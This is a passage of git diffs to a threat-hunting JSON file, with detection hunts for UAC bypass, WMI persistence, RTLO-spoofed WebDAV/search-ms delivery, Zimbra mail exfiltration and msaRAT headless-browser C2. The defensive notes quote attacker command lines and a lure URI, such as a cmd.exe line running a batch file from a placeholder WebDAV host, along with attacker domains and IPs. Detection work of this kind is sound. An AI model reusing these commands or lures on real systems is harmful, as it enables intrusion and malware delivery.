+    "why": "- **The footprint is narrow and well-known — that's the defender's edge.** The technique reduces to one registry-key family plus an auto-elevating binary spawning an unexpected child, so a tight rule catches the whole UACME family without drowning in noise.\n- **Registry writes must be caught in flight.** Operators frequently delete the `shell\\open\\command` key right after elevation, so real-time Sysmon EID 13 capture — not a point-in-time scan — is what preserves the payload-bearing evidence.\n- **Process lineage is a hard behavioral invariant.** `fodhelper.exe` or `computerdefaults.exe` never legitimately spawns `cmd`/`powershell`; a Medium→High integrity jump with no preceding `consent.exe` prompt is a structural anomaly that survives payload changes.\n- **It gates the expensive post-exploitation.** UAC bypass is the doorway to credential dumping, service install, and tamper of security tools; catching the elevation denies the operator high-integrity actions before they start.",
+    "references": "- [MITRE ATT&CK T1548.002: Abuse Elevation Control Mechanism — Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Elastic Security Labs: Exploring Windows UAC Bypasses — Techniques and Detection Strategies](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies)\n- [Splunk Security Content: FodHelper UAC Bypass](https://research.splunk.com/endpoint/909f8fd8-7ac8-11eb-a1f3-acde48001122/)\n- [Atomic Red Team: T1548.002 — Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md)\n- [hfiref0x/UACME: Defeating Windows User Account Control (technique catalogue)](https://github.com/hfiref0x/UACME)",
+    "file_path": "Flames/H243.md",
+    "created": null
+  },
+  {
     "id": "M001",
     "category": "Alchemy",
     "title": "A machine learning model can detect anomalies in user login patterns that indicate compromised accounts.",
@@ -8864,5 +9036,41 @@
     "references": "- [MITRE ATT&CK T1213.004: Data from Information Repositories — Customer Relationship Management Software](https://attack.mitre.org/techniques/T1213/004/)\n- [Microsoft Security Blog: Defending SaaS-based applications against ShinyHunters OAuth abuse](https://www.microsoft.com/en-us/security/blog/2026/07/13/defending-saas-based-applications-against-shinyhunters-oauth-abuse/)\n- [Google Cloud / Mandiant: The Cost of a Call — From Voice Phishing to Data Extortion (UNC6040)](https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion)\n- [AppOmni: Detecting ShinyHunters/UNC6040 Vishing in Salesforce OAuth Attacks](https://appomni.com/blog/detecting-unc6040-vishing-in-salesforce-oauth-attacks/)\n- [Salesforce: Real-Time Event Monitoring — ReportExport and API events](https://help.salesforce.com/s/articleView?id=sf.real_time_event_monitoring_overview.htm)\n- [Elastic Security Labs: Microsoft Entra ID OAuth Phishing and Detections](https://www.elastic.co/security-labs/entra-id-oauth-phishing-detection)",
     "file_path": "Alchemy/M028.md",
     "created": "2026-07-18T14:13:05-05:00"
+  },
+  {
+    "id": "M029",
+    "category": "Alchemy",
+    "title": "Anomalous mail-data egress volume from the webmail tier to first-seen external domains (Zimbra XSS exfil)",
+    "tactic": "Exfiltration",
+    "notes": "ALCHEMY ANALYTIC — per-server / per-user volumetric + first-seen-destination anomaly detection on webmail egress. PLATFORM: Linux (Zimbra Collaboration Suite mail servers) and the network/proxy tier in front of webmail. Sources: Unit 42, \"Russian Global Webmail Espionage\" (2026-07-23, tracked as CL-STA-1114 / Void Blizzard / LAUNDRY BEAR), and CISA advisory AA26-204A (Russian state-sponsored phishing targeting Zimbra users, 2026-07-23). The intrusion set exploited CVE-2025-66376 via a phishing email carrying an HTML attachment with an obfuscated Base64 script; observed dwell time averaged ~35 days. Note: Unit 42 does NOT corroborate the Sednit/APT28 attribution some press applied; it tracks the actor as Void Blizzard / LAUNDRY BEAR.\n\nWHY MODEL-ASSISTED (not a static rule): webmail servers make outbound web requests constantly (federation, link previews, integrations), and the XSS payload runs inside a legitimate authenticated session, so exfil traffic is camouflaged. Attackers also pace collection over weeks. The separating signal is deviation from a given server's or user's own egress envelope plus destination novelty — a volumetric/behavioral problem, not a signature. The actor's transport protocol/port and exact volume were NOT published, so a threshold tuned to one campaign will not generalize; per-entity baselining will.\n\nDATA SOURCES / FIELDS: web proxy / NGFW / NetFlow-IPFIX egress from the webmail subnet (bytes_out, dest domain/IP, dest port, request count, TLS SNI, HTTP host + user-agent); Zimbra access/mailbox audit logs (mailbox.log, audit.log) for read/search/export volume per account; DNS logs for first-seen external domain resolution from the mail tier. FEATURES per webmail server AND per authenticated user over a rolling ~30-day baseline: summed outbound bytes to external destinations; count of distinct external domains contacted; share of egress to first-seen / newly-registered domains; request rate to a single external host; egress outside business hours; ratio of current egress to that entity's historical mean; correlation of an egress spike with a preceding inbound HTML-attachment email. MODEL: per-entity baseline + robust outlier scoring (z-score/MAD or isolation forest) on the volume and destination-novelty features; alert when an entity crosses from its normal envelope into sustained high-volume egress, weighted heavily when the destination is first-seen or matches a Zimbra-lookalike naming pattern.\n\nKNOWN-BAD SEED IOCs (for backtest/enrichment, not as the detection): domains masquerading as Zimbra services — zimbra-metadata[.]com, zimbrastat[.]com, zimbrasoft[.]com[.]ua, synacorzimbra[.]nl, mailnalysis[.]com, emailanalytics[.]com[.]ua, analyticemailmeter[.]com, istc-cloud[.]com; IPs 37.120.247[.]228, 64.226.124[.]190, 104.248.134[.]194, 185.86.79[.]95, 193.238.152[.]66, 194.156.103[.]193, 216.252.238[.]18/.64/.104. VALIDATION / TUNING: backtest against known heavy periods (mail migrations, bulk-export/eDiscovery, newsletter sends) to set per-entity thresholds; allowlist sanctioned integrations/federation destinations by domain but keep them baselined. NAIVE FOIL: a fixed \"N MB/day out of the mail server\" threshold — bypassed by paced multi-week exfil and noisy on federated servers; the separating signal is deviation from the entity's own egress baseline plus destination novelty. CROSS-REF: T1114.002 (Remote Email Collection — what is being staged/stolen), T1556.006 (MFA interception — the 2FA/session material the payload also grabs), and T1189 (drive-by/zero-click XSS as the delivery) for the upstream legs.",
+    "tags": [
+      "exfiltration",
+      "linux",
+      "webmail",
+      "zimbra",
+      "email_collection",
+      "volumetric",
+      "model_assisted",
+      "void_blizzard",
+      "laundry_bear",
+      "t1048_003",
+      "t1114_002",
+      "t1556_006",
+      "T1048.003"
+    ],
+    "techniques": [
+      "T1048.003"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The request is legitimate; the volume and destination are not.** A webmail server making outbound web requests is normal, and the XSS payload runs inside a real authenticated session, so no single request is malicious — only the deviation from the server's/user's own egress envelope, and the novelty of the destination, separate theft from work. That per-entity anomaly framing is why this is an Alchemy hunt, not a Flame.\n- **Static thresholds lose both ways here.** The actor paced collection over a ~35-day dwell and the campaign's transport/volume were never published, so a fixed MB/day limit is both bypassed by slow exfil and noisy on federated mail servers; a per-entity baseline adapts to each server's normal and catches the relative spike.\n- **Destination novelty is the durable half of the signal.** The operators used domains dressed up as Zimbra analytics/metadata services; modeling the *rate of first-seen external destinations* from the mail tier catches the pattern even after the specific lookalike domains rotate — where an IOC block-list goes stale.\n- **The mail tier is a bright, well-scoped place to watch.** Webmail servers have a small, stable set of legitimate external destinations, so egress anomalies there carry far more signal than the same analytic run against general user browsing.",
+    "references": "- [MITRE ATT&CK T1048.003: Exfiltration Over Alternative Protocol — Exfiltration Over Unencrypted Non-C2 Protocol](https://attack.mitre.org/techniques/T1048/003/)\n- [Unit 42 (Palo Alto Networks): Russian Global Webmail Espionage (CL-STA-1114 / Void Blizzard)](https://unit42.paloaltonetworks.com/russian-webmail-espionage/)\n- [CISA Advisory AA26-204A: Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Zimbra Collaboration Suite Users](https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a)\n- [ESET Research: Operation RoundPress — XSS Exploitation of Webmail Servers (Zimbra/Roundcube/Horde)](https://www.welivesecurity.com/en/eset-research/operation-roundpress/)\n- [Elastic Security Labs: Hunting for Data Exfiltration Over the Network](https://www.elastic.co/security-labs/network-exfiltration-detection)\n- [MITRE ATT&CK T1114.002: Email Collection — Remote Email Collection](https://attack.mitre.org/techniques/T1114/002/)",
+    "file_path": "Alchemy/M029.md",
+    "created": null
   }
 ]

--- a/public/hunts-data.json
+++ b/public/hunts-data.json
@@ -8233,7 +8233,7 @@
     "why": "- Talos tied this behavior to active Chaos ransomware operations and named concrete artifacts: `update_ms.msi`, `C:\\ProgramData\\update_ms.msi`, `lib.dll`, and CDP binding names such as `msaOpen` and `msaMessage`.\n- The hunt survives IP and domain rotation because the RAT still has to stage an MSI, load the embedded DLL, start a headless browser, and control it through a local debugging channel.\n- MDR teams can observe the chain with standard endpoint telemetry: process creation, file creation, module loads, browser command lines, localhost connections, and process-owned network metadata.\n- False positives are controllable because benign browser automation is not expected to appear immediately after `curl.exe` writes an MSI into `ProgramData` and `msiexec.exe` loads a payload DLL.",
     "references": "- [Cisco Talos: Chaos ransomware msaRAT browser C2](https://blog.talosintelligence.com/chaos-msarat-living-off-the-browser-to-build-covert-c2-channel/)\n- [MITRE ATT&CK T1105 Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)\n- [MITRE ATT&CK T1218.007 Msiexec](https://attack.mitre.org/techniques/T1218/007/)\n- [MITRE ATT&CK T1090 Proxy](https://attack.mitre.org/techniques/T1090/)\n- [MITRE ATT&CK T1071.001 Web Protocols](https://attack.mitre.org/techniques/T1071/001/)",
     "file_path": "Flames/H240.md",
-    "created": "2026-07-25T22:17:55-05:00"
+    "created": "2026-07-24T22:31:47-04:00"
   },
   {
     "id": "H241",

--- a/public/hunts-data.json
+++ b/public/hunts-data.json
@@ -981,7 +981,7 @@
     "why": "- **Malicious WMI persistence hides among legitimate management subscriptions, not among noise.** The few products that create permanent subscriptions look structurally similar to an attacker's, so only a vetted allowlist of *which* consumers legitimately exist — keyed on the consumer action and its creating signer — makes a rogue one stand out. That is why this is an Ember, not a Flame.\n- **The repository must be swept, not just watched.** Persistence installed before monitoring began lives silently in the CIM database with no ongoing event; a one-time enumeration of `root\\subscription` across the estate is the only way to find pre-existing implants, which a purely streaming rule never sees.\n- **The volume is low enough to inventory completely.** Permanent subscriptions are rare, so unlike most baselines this one can aim for full coverage — every filter, consumer, and binding — turning the baseline itself into a durable asset inventory.\n- **It is the prerequisite for the persistence Flame.** H241 can only call a consumer \"unexpected\" against this allowlist; without the baseline, every SCCM or monitoring subscription is a false positive and the Flame is unusable.",
     "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [in.security: An Intro into Abusing and Identifying WMI Event Subscriptions for Persistence](https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/)\n- [osquery schema: wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings](https://osquery.io/schema/current)\n- [Splunk Security Content: WMI Permanent Event Subscription — Sysmon](https://research.splunk.com/endpoint/ad05aae6-3b2a-4f73-af97-57bd26cee3b9/)",
     "file_path": "Embers/B032.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "H001",
@@ -8198,42 +8198,6 @@
     "created": "2026-07-24T22:31:35-04:00"
   },
   {
-    "id": "H240",
-    "category": "Flames",
-    "title": "Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms",
-    "tactic": "Defense Evasion",
-    "notes": "PLATFORM: Windows. Source: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20), which recovered an operator's staging server full of bulk-generated lures. Final payload in\nboth observed chains was PureRAT 4.4.3 (build tag 06x12x2026SantaEbash2).\n\nATTACK MECHANICS (from the report): a JavaScript-triggered search-ms URI opens a WebDAV share filtered to a single\nextension — e.g. `search-ms:displayname=Search Results in \\\\onedrive.cv@80\\Downloads\\CURP&query=*.scr` — so the\nvictim sees what looks like a local search result. The lures follow a systematic naming scheme\n`HyperPackSetup.<method>.<trick>.<spoof>.lnk`, and the primary document lure was `ReportFinal.rcs.pdf`, an\nRTLO-masqueraded .scr. The report explicitly lists three spoofing tricks stacked together: RTLO (U+202E), double\nextensions, and whitespace padding before .exe / .scr. Sibling delivery vectors in the same kit: UNC paths,\nlibrary-ms, Control Panel items, and LOLBin proxies (iediagcmd.exe, CustomShellHost.exe, OfficeC2RClient.exe).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 11 (File Create) for files landing in Downloads/%TEMP% whose name contains U+202E, homoglyph\n  characters in the extension, or a double extension where the TRUE trailing extension is .lnk/.scr/.exe/.js.\n- WebClient service starting (svchost -k WebClientGroup / System 7036 \"WebClient → Running\") on a host that does\n  not normally mount WebDAV, immediately followed by:\n- Sysmon EID 1: `rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie <host>@<port> http://<host>:<port>/`\n  (SysWOW64 variant too) — the WebDAV client fetching content — with Sysmon EID 3 to a first-seen/external host.\n- Process lineage: explorer.exe → the spoofed .lnk/.scr, or cmd.exe `/c \\\\<host>@SSL\\DavWWWRoot\\new.bat`, or a\n  decoy .pdf opened from the same DavWWWRoot path while the real payload executes.\n- Parse recovered .lnk with LECmd: RelativePath / WorkingDir pointing at `\\\\<host>@<port>\\DavWWWRoot\\files`.\n\nCROSS-REF: pair with T1036.002 (Right-to-Left Override — the RTLO half of the same spoof), T1204.002 (Malicious\nFile — the user double-click this hunt depends on), and T1055 (the report's PureRAT injects into a signed Qihoo\n360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the\npost-execution stages of the same intrusion set.\n",
-    "tags": [
-      "defense_evasion",
-      "windows",
-      "masquerading",
-      "double_extension",
-      "rtlo",
-      "webdav",
-      "search_ms",
-      "initial_access",
-      "purerat",
-      "t1036_007",
-      "t1036_002",
-      "t1204_002",
-      "T1036.007"
-    ],
-    "techniques": [
-      "T1036.007"
-    ],
-    "severity": null,
-    "status": "current",
-    "related_hunt_ids": [],
-    "submitter": {
-      "name": "Lauren Proehl",
-      "link": "https://x.com/jotunvillur"
-    },
-    "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
-    "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
-    "file_path": "Flames/H240.md",
-    "created": null
-  },
-  {
     "id": "H241",
     "category": "Flames",
     "title": "WMI permanent event subscription persistence executing a script interpreter or LOLBin",
@@ -8265,7 +8229,7 @@
     "why": "- **Fileless and SYSTEM-context by design.** The persistence lives in the CIM repository, not the filesystem, and executes through a trusted broker, so disk-based and signature detections miss it — creation telemetry (Sysmon 19/20/21) is the reliable catch point.\n- **The telemetry is nearly noise-free.** Permanent WMI subscriptions are rare outside a handful of management tools, so a log-all approach with a small allowlist yields high-fidelity alerts rather than a flood.\n- **Temporal correlation is a strong, durable signal.** Filter + consumer + binding created within the same second is a structural fingerprint of the technique that survives payload and infrastructure changes.\n- **It pairs with a concrete baseline.** The one false-positive source — legitimate management subscriptions — is exactly what B032 inventories, so the two hunts together turn \"any subscription\" into \"any subscription not on the allowlist.\"",
     "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [SigmaHQ: WMI Event Subscription (sysmon_wmi_event_subscription.yml)](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml)\n- [Splunk Security Content: Detect WMI Event Subscription Persistence](https://research.splunk.com/endpoint/01d9a0c2-cece-11eb-ab46-acde48001122/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [Detect.FYI: Hunting WMI Event Subscription Persistence](https://detect.fyi/hunting-wmi-event-subscription-persistence-f087900029f4)",
     "file_path": "Flames/H241.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "H242",
@@ -8299,7 +8263,7 @@
     "why": "- **The check runs before the payload, so catching it interdicts everything downstream.** Both loaders decide whether to detonate based on the anti-debug gate; the injection, C2, and persistence only happen if the gate passes — so the anti-analysis behavior is the earliest reliable catch point.\n- **Self-debugging is anomalous by construction.** A short-lived, unsigned process creating a debug object and attaching to a child it just spawned (with a spoofed `winlogon.exe` parent) is not something benign software does — it is the technique's fingerprint, independent of the C2 or payload.\n- **The banned-process scan is a distinctive tell.** A `CreateToolhelp32Snapshot` walk that matches on `x64dbg`/`windbg`/`procmon`/`wireshark` and is immediately followed by self-termination is a behavioral signature that survives sample changes.\n- **Direct syscalls signal deliberate evasion.** `ZwSystemDebugControl`/`NtSetContextThread` issued via SysWhispers-style direct syscalls (bypassing ntdll hooks) from a non-debugger is itself suspicious and, where ETW-TI is available, directly observable.",
     "references": "- [MITRE ATT&CK T1622: Debugger Evasion](https://attack.mitre.org/techniques/T1622/)\n- [Sekoia TDR: RATatouille — Cooking Up Chaos in the I2P Kitchen (I2PRAT)](https://www.sekoia.com/blog/ratatouille-cooking-up-chaos-in-the-i2p-kitchen)\n- [Sekoia TDR: PikaBot — a Guide to its Deep Secrets and Operations](https://www.sekoia.com/blog/pikabot-a-guide-to-its-deep-secrets-and-operations)\n- [Check Point Anti-Debug Reference: Debug Objects & Debugger Detection](https://anti-debug.checkpoint.com/)\n- [Unprotect Project: Anti-Debugging Techniques](https://unprotect.it/category/anti-debugging/)\n- [MITRE ATT&CK T1497.001: Virtualization/Sandbox Evasion — System Checks](https://attack.mitre.org/techniques/T1497/001/)",
     "file_path": "Flames/H242.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "H243",
@@ -8333,6 +8297,42 @@
     "why": "- **The footprint is narrow and well-known — that's the defender's edge.** The technique reduces to one registry-key family plus an auto-elevating binary spawning an unexpected child, so a tight rule catches the whole UACME family without drowning in noise.\n- **Registry writes must be caught in flight.** Operators frequently delete the `shell\\open\\command` key right after elevation, so real-time Sysmon EID 13 capture — not a point-in-time scan — is what preserves the payload-bearing evidence.\n- **Process lineage is a hard behavioral invariant.** `fodhelper.exe` or `computerdefaults.exe` never legitimately spawns `cmd`/`powershell`; a Medium→High integrity jump with no preceding `consent.exe` prompt is a structural anomaly that survives payload changes.\n- **It gates the expensive post-exploitation.** UAC bypass is the doorway to credential dumping, service install, and tamper of security tools; catching the elevation denies the operator high-integrity actions before they start.",
     "references": "- [MITRE ATT&CK T1548.002: Abuse Elevation Control Mechanism — Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Elastic Security Labs: Exploring Windows UAC Bypasses — Techniques and Detection Strategies](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies)\n- [Splunk Security Content: FodHelper UAC Bypass](https://research.splunk.com/endpoint/909f8fd8-7ac8-11eb-a1f3-acde48001122/)\n- [Atomic Red Team: T1548.002 — Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md)\n- [hfiref0x/UACME: Defeating Windows User Account Control (technique catalogue)](https://github.com/hfiref0x/UACME)",
     "file_path": "Flames/H243.md",
+    "created": "2026-07-25T22:17:55-05:00"
+  },
+  {
+    "id": "H244",
+    "category": "Flames",
+    "title": "Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms",
+    "tactic": "Defense Evasion",
+    "notes": "PLATFORM: Windows. Source: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20), which recovered an operator's staging server full of bulk-generated lures. Final payload in\nboth observed chains was PureRAT 4.4.3 (build tag 06x12x2026SantaEbash2).\n\nATTACK MECHANICS (from the report): a JavaScript-triggered search-ms URI opens a WebDAV share filtered to a single\nextension — e.g. `search-ms:displayname=Search Results in \\\\onedrive.cv@80\\Downloads\\CURP&query=*.scr` — so the\nvictim sees what looks like a local search result. The lures follow a systematic naming scheme\n`HyperPackSetup.<method>.<trick>.<spoof>.lnk`, and the primary document lure was `ReportFinal.rcs.pdf`, an\nRTLO-masqueraded .scr. The report explicitly lists three spoofing tricks stacked together: RTLO (U+202E), double\nextensions, and whitespace padding before .exe / .scr. Sibling delivery vectors in the same kit: UNC paths,\nlibrary-ms, Control Panel items, and LOLBin proxies (iediagcmd.exe, CustomShellHost.exe, OfficeC2RClient.exe).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 11 (File Create) for files landing in Downloads/%TEMP% whose name contains U+202E, homoglyph\n  characters in the extension, or a double extension where the TRUE trailing extension is .lnk/.scr/.exe/.js.\n- WebClient service starting (svchost -k WebClientGroup / System 7036 \"WebClient → Running\") on a host that does\n  not normally mount WebDAV, immediately followed by:\n- Sysmon EID 1: `rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie <host>@<port> http://<host>:<port>/`\n  (SysWOW64 variant too) — the WebDAV client fetching content — with Sysmon EID 3 to a first-seen/external host.\n- Process lineage: explorer.exe → the spoofed .lnk/.scr, or cmd.exe `/c \\\\<host>@SSL\\DavWWWRoot\\new.bat`, or a\n  decoy .pdf opened from the same DavWWWRoot path while the real payload executes.\n- Parse recovered .lnk with LECmd: RelativePath / WorkingDir pointing at `\\\\<host>@<port>\\DavWWWRoot\\files`.\n\nCROSS-REF: pair with T1036.002 (Right-to-Left Override — the RTLO half of the same spoof), T1204.002 (Malicious\nFile — the user double-click this hunt depends on), and T1055 (the report's PureRAT injects into a signed Qihoo\n360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the\npost-execution stages of the same intrusion set.\n",
+    "tags": [
+      "defense_evasion",
+      "windows",
+      "masquerading",
+      "double_extension",
+      "rtlo",
+      "webdav",
+      "search_ms",
+      "initial_access",
+      "purerat",
+      "t1036_007",
+      "t1036_002",
+      "t1204_002",
+      "T1036.007"
+    ],
+    "techniques": [
+      "T1036.007"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
+    "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
+    "file_path": "Flames/H244.md",
     "created": null
   },
   {
@@ -9071,6 +9071,6 @@
     "why": "- **The request is legitimate; the volume and destination are not.** A webmail server making outbound web requests is normal, and the XSS payload runs inside a real authenticated session, so no single request is malicious — only the deviation from the server's/user's own egress envelope, and the novelty of the destination, separate theft from work. That per-entity anomaly framing is why this is an Alchemy hunt, not a Flame.\n- **Static thresholds lose both ways here.** The actor paced collection over a ~35-day dwell and the campaign's transport/volume were never published, so a fixed MB/day limit is both bypassed by slow exfil and noisy on federated mail servers; a per-entity baseline adapts to each server's normal and catches the relative spike.\n- **Destination novelty is the durable half of the signal.** The operators used domains dressed up as Zimbra analytics/metadata services; modeling the *rate of first-seen external destinations* from the mail tier catches the pattern even after the specific lookalike domains rotate — where an IOC block-list goes stale.\n- **The mail tier is a bright, well-scoped place to watch.** Webmail servers have a small, stable set of legitimate external destinations, so egress anomalies there carry far more signal than the same analytic run against general user browsing.",
     "references": "- [MITRE ATT&CK T1048.003: Exfiltration Over Alternative Protocol — Exfiltration Over Unencrypted Non-C2 Protocol](https://attack.mitre.org/techniques/T1048/003/)\n- [Unit 42 (Palo Alto Networks): Russian Global Webmail Espionage (CL-STA-1114 / Void Blizzard)](https://unit42.paloaltonetworks.com/russian-webmail-espionage/)\n- [CISA Advisory AA26-204A: Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Zimbra Collaboration Suite Users](https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a)\n- [ESET Research: Operation RoundPress — XSS Exploitation of Webmail Servers (Zimbra/Roundcube/Horde)](https://www.welivesecurity.com/en/eset-research/operation-roundpress/)\n- [Elastic Security Labs: Hunting for Data Exfiltration Over the Network](https://www.elastic.co/security-labs/network-exfiltration-detection)\n- [MITRE ATT&CK T1114.002: Email Collection — Remote Email Collection](https://attack.mitre.org/techniques/T1114/002/)",
     "file_path": "Alchemy/M029.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   }
 ]

--- a/public/hunts-data.json
+++ b/public/hunts-data.json
@@ -8198,6 +8198,44 @@
     "created": "2026-07-24T22:31:35-04:00"
   },
   {
+    "id": "H240",
+    "category": "Flames",
+    "title": "Chaos msaRAT headless browser C2 after MSI staging",
+    "tactic": "Execution, Stealth, Command and Control",
+    "notes": "Endpoint process telemetry - Core filter: `curl.exe` writing `C:\\ProgramData\\update_ms.msi` or `msiexec.exe` executing an MSI from `C:\\ProgramData`. Triage values: `process command line`, `parent process command line`, `file path`, `user`, `host`. Pivot: look for `msiexec.exe` custom action behavior and follow-on DLL load from the same installer window. Strong red flags: plain `http://` transfer on port `443`, `update_ms.msi`, and staging outside a managed software deployment path.\n\nModule and browser launch telemetry - Core filter: MSI execution followed by `lib.dll` load and Chrome or Edge launched by a non-browser parent. Triage values: `loaded module path`, `process command line`, `parent process name`, `parent process command line`. Pivot: search for browser flags such as `--headless`, `--remote-debugging-port`, `--remote-debugging-address`, and Chrome or Edge started from an unusual parent after the MSI runs. Strong red flags: a newly launched headless browser with a local debugging port immediately after `msiexec.exe` activity.\n\nLocal browser control telemetry - Core filter: a non-browser process connecting to `127.0.0.1` on the browser debugging port, then issuing CDP style paths or WebSocket control. Triage values: `source process`, `destination IP address`, `destination port`, `process command line`, `user`. Pivot: correlate local debugging connections with browser-owned requests to `/json/list/`, `Target.createTarget`, `Page.setBypassCSP`, `Runtime.addBinding`, or 